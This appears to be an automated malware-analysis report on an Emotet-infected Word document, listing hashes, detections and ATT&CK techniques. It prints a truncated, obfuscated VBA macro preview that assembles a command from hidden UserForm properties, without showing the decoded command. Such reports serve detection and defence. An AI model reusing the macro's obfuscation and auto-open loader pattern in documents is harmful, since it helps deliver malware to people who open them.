Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 02f25c2096bb8cb8…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 100.3 KB
Created: 2019-12-19 05:44:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04

MD5: f969b036b9dad25304d94e548c8fc96f
SHA-1: 81b6f487e9770a185fa515c17a937764c980781e
SHA-256: 02f25c2096bb8cb8fd739f680af0fe3e4bcf9c9abfce948fc3765efe398cce10

Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample contains a VBA macro with a Document_Open auto-execution routine. Critical heuristics indicate a hidden UserForm command stager, which is a known technique used by Emotet for downloading and executing further payloads. ClamAV detection also explicitly names Emotet. The macro's obfuscated nature and use of CreateObject and GetObject point towards malicious intent.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7465219-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7465219-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13375 bytes
SHA-256: 70c9e577179092f152d1f2a83d4d0e0d1f1699c1cc3c65251ba373a4034c59bd

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "Yjxdjuqww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Izmjwhnzzja, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ewlqnnbaw = "Kristina"
Dim Xiuukcxvkunwm As String
Dim Dmduclsljli As String
Iqduexwkos = ("Dolor.")
Dim Wipnqzycxjoxb As Double
Dim Fwljbbmnuq As String
Dim Pqfouvxgdcys As Integer
Ynybgsdkrn = Gvjvuxxhjl
Dim Ubeujcysxrdy As Boolean
Kapeyrlkpcwi = ("Minnie")
Dim Veamwchf As Double
Dim Bppklorlgb As Boolean
Dim Remzjjlcxbuxx As Double
Qcllemgdjca = "Et."
Dim Klbfoymv As Boolean
Dim Txullavsnrybi As String
Dim Ijlbdxjkksm As Boolean
Jyguqgsokau = ("Distinctio minus facilis.")
Dim Kmhcichpfpb As Integer
Yjnktzahipkdl = 914
Bxiqxpnw = Jjrydjfat
Bahvcgbxwz = 21
Verzkblyn
   Nkfdxwjyg = "Nulla non dignissimos eum rerum accusamus ducimus sit omnis maxime."
Dim Xhkcyzvzloi As Boolean
Dim Iqdmazbm As Integer
Rlsdacbec = ("Laboriosam quos libero quam in temporibus placeat.")
Dim Apzwfpfmfsfn As Boolean
Dim Gswxhzcoatrf As String
Dim Wjjgxihbepuk As Boolean
Dnmynitjeguzp = Gfzskpvjypw
Dim Ogdxdclmg As Boolean
Ocneclytwnxk = ("Beatae.")
Dim Lkieniqvovxd As Integer
Dim Nabzmhehcqgnr As Double
Dim Rqwifssdisk As Double
Nrhznbfvlxxn = "Voluptate et consectetur."
Dim Hrxzrmfw As Boolean
Dim Vrdvxthc As Integer
Dim Ukjhzpxuft As Integer
Toklktspmqng = ("Distinctio.")
Dim Xkysqviajxhqa As Boolean
Krlcaypklin = 723
Zdwdddrnvnc = Sfmetsqabz
Dxizmjcm = 25
End Sub

Attribute VB_Name = "Kvekxrandg"
Attribute VB_Base = "0{CC76A9E4-8F36-43E6-BEEA-3A679F9EBA9D}{DDC7A40E-2166-4113-8489-BD679C79F6E9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Oatfkhwijuwp"
Function Ysesnyrslmjpz()
   Empanmxxg = "Perspiciatis laboriosam cupiditate."
Dim Ubxbzmniki As Double
Dim Vkrexhlu As Boolean
Iniqirmtfwug = ("Mack")
Dim Bnhzdibx As Boolean
Dim Upviapvcrc As Boolean
Dim Tjdvvqchjo As String
Djalqjplmzv = Dtqbrpnjquxvi
Dim Utygvgfroj As String
Mhxtnkyrx = ("Guy")
Dim Sygfmodpi As Boolean
Dim Rsapyqycc As Integer
Dim Ibcsajlkv As Boolean
Ogioascku = "Velit voluptatem."
Dim Hqftymitvk As Integer
Dim Pedtoteybr As Boolean
Dim Thjpfzrx As String
Tlnhlybbsyats = ("Et consectetur ducimus rem itaque laboriosam fugiat fugit.")
Dim Zorqfkqgbzqdt As Integer
Sqkslrgghfwz = 707
Dzozsglahx = Flhuviox
Jayfthjkik = 833
Yxgygfrfhlacg = Yjxdjuqww.Izmjwhnzzja
   Tktovuwtcstj = "Dolore."
Dim Ospimpxr As String
Dim Sqbhoxfxmqu As Boolean
Ejgpebfjwtqe = ("Eaque accusantium est.")
Dim Dfcvcrdweso As String
Dim Nvwhjvxk As Integer
Dim Atqnfvxld As Double
Brkusbrien = Wroalhipcdacc
Dim Xahhletl As Boolean
Nrtgcvratt = ("At sed sapiente explicabo.")
Dim Vmeukhxrisgx As Integer
Dim Xfoucgkoy As String
Dim Jaiibisigfv As Integer
Tmnleulwmux = "Est dicta quia."
Dim Zqpghnofbh As Double
Dim Gjnondccya As String
Dim Ykdeswflwqjc As Integer
Xhplseycxlxhz = ("Beatrice")
Dim Jmyzwiwkkmfbd As Double
Alvnfumnimu = 126
Sglwopmdkc = Bwfymcupilm
Mawzqmclks = 62
Ospufpjm = Yxgygfrfhlacg + Kvekxrandg.Tolxoiunzpcdn + Kvekxrandg.Qhtqoquxzoo + Kvekxrandg.Rzmvgfayscp
   Utlatynpak = "Labore."
Dim Uedfdozkfyuj As Double
Dim Chkmyzrperol As Double
Fqqdzmyornptl = ("Nemo.")
Dim Wycpbwffn As String
Dim Ceamqsaceohr As Double
Dim Uopwxfokihsmv As Double
Aldrfjto = Wsjcspgsrhipj
Dim Frvstexnb As Boolean
Eaeoazkz = ("Vero excepturi.")
Dim Fiqsludftk As Boolean
Dim Lzsyvlszfh As String
Dim Kgndgiekpta As Integer
Aikthiubr = "Quia velit enim eligendi at libero dolorem et minima."
Dim Vcezgahxk As Double
Dim Fhzzkfrxr As String
Dim Svdifxzdnt As String
Ieefdoldy = ("Guadalupe")
Dim Cduixojuxhmj As String
Yukyhooozqvga = 469
Fulpcaflo = Eytawuviftb
... (truncated)